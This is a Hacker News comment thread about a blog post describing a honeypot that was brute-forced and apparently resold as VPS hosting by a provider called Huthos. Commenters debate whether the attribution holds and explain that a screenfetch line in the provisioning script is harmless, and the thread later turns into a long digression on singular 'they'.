
Hacker tries to compromise and resell an internet-facing Linux server - zdw
http://morris.guru/huthos-the-totally-100-legit-vps-provider/
======
JosephRedfern
Not to say that Huthos are innocent, but I don't see any concrete proof that
they are behind this attack. The fact that they are hosting a server
provisioning script is hardly crazy, given that they are a hosting provider.
What's to say that the ACTUAL attacker didn't just come across the
provisioning script and decide to use it for themselves? The script URL is
listed publicly online: [http://yandicunk.blogspot.co.uk/2015/03/cara-setting-
dan-ins...](http://yandicunk.blogspot.co.uk/2015/03/cara-setting-dan-instal-
vps-centos-6-32.html) &
[http://huthos.com/tutorial/autoscripthuthos.html](http://huthos.com/tutorial/autoscripthuthos.html)

"It also appears that the hackers attack machine may be hosting an
unauthenticated web proxy" makes it sound like the attacker owns the machine
they were connecting from. IMO, chances are that "49.213.23.171" is just
another compromised box.

~~~
andrewballs
Hi, thanks for your comment. It wasn't really my objective to find the smoking
gun and bring Huthos' operation crumbling to the ground. Like you, I don't
definitively know that the operators of the website are the same people that
broke into my honeypot without permission. It seems more likely than another
totally-unrelated bad guy knowing where the file paths are to the Huthos
provisioning scripts when directory listing isn't enabled, as well as other
small nuances that I gathered while investigating this attack (the operators
of the website posting videos of them exploiting Shellshock on their youtube
channel, etc).

~~~
JosephRedfern
Agreed - after doing a little more digging myself, it does seem likely that
they are selling access to hacked machines - however, I'm sure there are other
cases of attackers using legitimate scripts to provision their servers!

Also - has anyone seen how cheaply access is being sold for!? It's pennies!

~~~
pavel_lishin
Legitimate scripts that take a screenshot of your desktop every time you run
bash?

~~~
JosephRedfern
I agree - if that's what the script was doing, then it would be dodgy. But
that's not what the script does. `screenfetch` prints out system info in a
pretty, ASCII-arty way, like this:
[http://i.imgur.com/TgaPHqa.png](http://i.imgur.com/TgaPHqa.png)

    
    
        echo "screenfetch" >> .bashrc
    

just causes system info to be printed to the screen with every new bash
session.

~~~
pavel_lishin
Oh, derp, I completely misread the github repo. :/

------
dmlorenzetti
All of this is outside my experience, so I have to ask - how does the attack,
as described, prove HutHos is the perpetrator?

The poster was able to find the HutHos site owner's full information "in a few
minutes", due to "poor operational security practices." Doesn't this raise the
possibility that the HutHos server was compromised by the malware's true
owner?

~~~
fragsworth
It's because the script appears to be taking control of servers for hosting
purposes.

In other words, the simplest explanation is that Huthos is taking control of
machines so that they can sell them to customers as their own VPS service.

~~~
JosephRedfern
A VPS provider having a server provisioning script available doesn't seem to
be such a crazy thing to me - it still doesn't prove that Huthos are behind
the attacks.

~~~
blueskin_
On their public site? It's also written in such an amateurish style anyway...

------
dynsrv
Yes, you can contact Indonesian CERT. Good News, we have more than one :) \-
[http://www.idsirtii.or.id/halaman/tentang/kontak-
kami.html](http://www.idsirtii.or.id/halaman/tentang/kontak-kami.html) \-
[http://www.cert.or.id/kontak/en/](http://www.cert.or.id/kontak/en/)

------
dankohn1
This was amusing. I like imagining new attackers taking over the infected
machines and running their own VPS service on top of the hacked VPS accounts.
You could have poorly secured turtles all the way down.

------
kordless
There are three 'knobs' to the cloud today: compute, storage and networking. A
new emergent 'knob' for the cloud is trust. Trust affects three primary
features of the cloud: how it's paid for (credit vs. capital expenditure), how
it works (standards vs. custom solutions) and who I am (identity management
vs. anonymous use). I won't go into it much here, but cryptocurrencies play a
part in this knob, big time.

In Huthos case, they 'hack' the credit part by simply taking a machine with
poor identity management in place (honeypot) and then provide a high level of
anonymization for their customers (the 'who I am' above) and providing it as a
standard way for extending a VPS offering (which itself provides 'who I am'
services).

It's all about trust, and what's the most irritating part about it is that the
violate it first before they get to selling it to others. Crazy.

------
Gigablah
Looks like the owner of Huthos doesn't even bother hiding the nature of his
operations. The author mentions he has "poor operational security practices"
which is rather charitable given that the "buy a vps" links on the website
simply link directly to his Facebook profile.

~~~
MichaelGG
Or maybe Huthos was hacked and being used to host these scripts.

I'd want a bit more proof, like it actually being used by a Huthos customer,
before going after them.

~~~
Gigablah
The domain name could have been hijacked, yes. The whole sales page and the
"Vision Phreak" setup seens like a one-man operation so far though. (E.g. the
facebook group has over 10k members but it seems like the owner just added
them all by himself). And their Google+ profile is all about "phreaking" and
posts from wannabe hackers.

So yeah, not sure about Huthos but Vision Phreak is definitely shady.

------
BorisMelnik
Absolutely fascinating. I've been "in and around" the security community (not
a part of) for years now, and never heard of a company offering a service like
this.

I love how he gives advise to the company at the end. I mean c'mon you get
root access via dictionary attack within a quick timeframe and you don't think
it is a honeypot?

~~~
ryanlol
I rather doubt they actually care if the target server is a honeypot or not,
it looks like they're just looking for free hosting.

~~~
BorisMelnik
If that honeypot is a blogging security activist that is going to out them,
they might care.

~~~
ryanlol
If they didn't want to get outed they would probably be trying to conceal
themselves in the first place. Often there's no need for that.

------
rohan404
Guess the intruder wasn't completely convinced that chmod works the first time
around

~~~
jpmattia
Yeah, that was weird. Any ideas why the multiple executions occurred?

~~~
blueskin_
He wanted to make sure it was _really_ chmoded.

------
tomglindmeier
I wonder if Huthos is offering a SLA for their VPS :)

------
pavel_lishin
That provisioning script seems to install a screenshot utility that fires at
every login. That definitely doesn't seem like a standard feature for a
hosting provider to offer.

~~~
pavel_lishin
Ack, I completely misunderstood what screenfetch does. Disregard above
comment.

------
chambo622
On another note, how many times does one need to chmod a file?

~~~
tankenmate
What I suspect you can't see is an attempt to use TAB to autocomplete the
execution of the local script; when it fails the script kiddie tries to +x the
script again. I suspect you'll also find that the script doesn't execute
because bash isn't installed; only dash and/or busybox.

------
mutexes
the "/script/" directory is "secured" by some shoddy "password protector"
script that points to some other...shoddy facebook page.

Huthos could simply be an innocent clueless bystander in a larger compromise
situation.

[http://prntscr.com/6tah4b](http://prntscr.com/6tah4b)

------
Somasis
On a slightly unrelated note, I like how the author referred to the attacker
with she/her, a small detail I can appreciate since they normally refer to
them with he/him.

~~~
mhurron
Given that the attacker is unknown, the correct term would be they or them.
Gender is unknown, a gender neutral description should be used.

~~~
cddotdotslash
But they is plural, so wouldn't the author technically need to say "he or she"
for each occurrence? Sadly, English has no singular gender neutral pronoun.

~~~
Somasis
They can be used singular. Most people use it without thinking about it in
conversation.

~~~
monochromatic
Only people who don't mind sounding ignorant.

~~~
TheyAreFine
"...including Chaucer, Shakespeare, Jane Austen, Thackeray, and Shaw"

[https://en.wikipedia.org/wiki/Singular_they](https://en.wikipedia.org/wiki/Singular_they)

~~~
dang
Oh yeah. Also Byron ("Every body does and says what they please"), Austen
("Nobody thinks of that when they fall in love"), Thackeray ("A person can't
help their birth"), Wilde ("Experience is the name everyone gives to their
mistakes"), Shaw ("It's enough to drive anyone out of their senses"),

Lewis Carroll: "'Whoever lives there,' thought Alice, 'it'll never do to come
upon them this size: why, I should frighten them out of their wits!'"

C. S. Lewis: "She kept her head and kicked her shoes off, as everybody ought
to do who falls into deep water in their clothes."

Doris Lessing: "And how easy the way a man or woman would come in here, glance
around, find smiles and pleasant looks waiting for them, then wave and sit
down by themselves."

E.B. White: "But somebody taught you, didn’t they?”

This is settled. Singular 'they' is good English and always has been. The rule
against it was just made up by 18th century grammarians (including the
fascinating Ann Fisher [4], who surely would regret it now) and they even got
a law passed in 1850 prohibiting it, which only goes to show how widely used
it was.

1\.
[https://web.archive.org/web/20150328135337/http://www.crossm...](https://web.archive.org/web/20150328135337/http://www.crossmyt.com/hc/linghebr/sgtheirl.html)

2\.
[http://itre.cis.upenn.edu/~myl/languagelog/archives/002748.h...](http://itre.cis.upenn.edu/~myl/languagelog/archives/002748.html)

3\.
[http://www.pemberley.com/janeinfo/austhlis.html](http://www.pemberley.com/janeinfo/austhlis.html)

4\. [http://www.nytimes.com/2009/07/26/magazine/26FOB-
onlanguage-...](http://www.nytimes.com/2009/07/26/magazine/26FOB-
onlanguage-t.html?_r=0&gwh=CC1FD7DF9F445A743AE7FFF6E7016729&gwt=pay)

~~~
monochromatic
Hmm. Well, if Garner's[1] on board with it, I guess I can be too.

[1] [http://www.lawprose.org/blog/?p=502](http://www.lawprose.org/blog/?p=502)

------
stevenh
While interesting, I'm not sure how I feel about him ending the article with
solid advice for criminals on how to avoid getting caught.

~~~
andrewballs
I'm the author of this post. You mention a tough philosophical quandary that I
struggle with every time I share information with the rest of the world.

As much as I hate giving attackers anything, I am very dedicated to
information sharing so that people can learn as much as possible from my
posts. The truth is always out there one way or another. I would rather
everybody be as educated as possible. Hopefully that makes sense.

~~~
tomglindmeier
I couldn't agree more.

------
karangoeluw
So... the attacker accessed the server of a security consultant by
"bruteforcing a username and password combination"...

EDIT: Security newb here. It was a honeypot, aka a trap.

~~~
secure
Not “the server”, the attacker logged into a honeypot, see
[http://en.wikipedia.org/wiki/Honeypot_%28computing%29](http://en.wikipedia.org/wiki/Honeypot_%28computing%29)

